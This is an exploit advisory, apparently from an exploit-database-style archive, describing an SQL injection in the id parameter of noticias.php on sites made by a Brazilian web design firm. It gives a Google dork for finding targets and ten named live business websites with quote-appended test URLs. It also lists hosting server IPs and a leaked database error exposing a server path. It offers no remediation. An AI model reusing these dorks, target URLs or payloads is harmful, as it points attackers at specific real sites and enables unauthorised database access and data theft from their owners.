##############################################################
# Exploit Title : Criação sitesrapidos.com.br Web Design Brazil SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 16/01/2019
# Vendor Homepage : sitesrapidos.com.br
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''criação: sitesrapidos.com.br''
criação: sitesrapidos.com.br inurl:/noticias.php?id=
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
##############################################################
# SQL Injection Exploit :
***********************
/noticias.php?id=[SQL Injection]
##############################################################
# Example Vulnerable Sites :
*************************
[+] sidermetal.com.br/noticias.php?id=3%27 =>
[ Proof of Concept for SQL Inj ] => archive.is/46g98
[+] bockrs.com.br/noticias.php?id=3%27
[+] sanderagropecuaria.com.br/noticias.php?id=3%27
[+] alcancyassessoria.com.br/noticias.php?id=4%27
[+] garagetec.com.br/noticias.php?id=68%27
[+] ferragemlampiao.com.br/noticias.php?id=1%27
[+] marcelokuhn.com.br/noticias.php?id=1%27
[+] genialrs.com.br/noticias.php?id=4%27
[+] btiseguros.com.br/noticias.php?id=70%27
[+] correspondentecaixars.com.br/noticias.php?id=5%27
Note : (63.247.92.74) => There are 31 domains hosted on this server.
Note : (192.185.170.138) => There are 159 domains hosted on this server.
Note : (187.45.193.229) => There are 549 domains hosted on this server.
Note : (187.45.210.66) => There are 95 domains hosted on this server.
Note : (192.185.170.14) => There are 60 domains hosted on this server.
Note : (192.185.31.71) => There are 194 domains hosted on this server.
##############################################################
# SQL Database Error :
**********************
Warning: mysql_fetch_array(): supplied argument is not a valid
MySQL result resource in /home/httpd/vhosts
/sanderagropecuaria.com.br/httpdocs/noticias.php on line 42
##############################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
##############################################################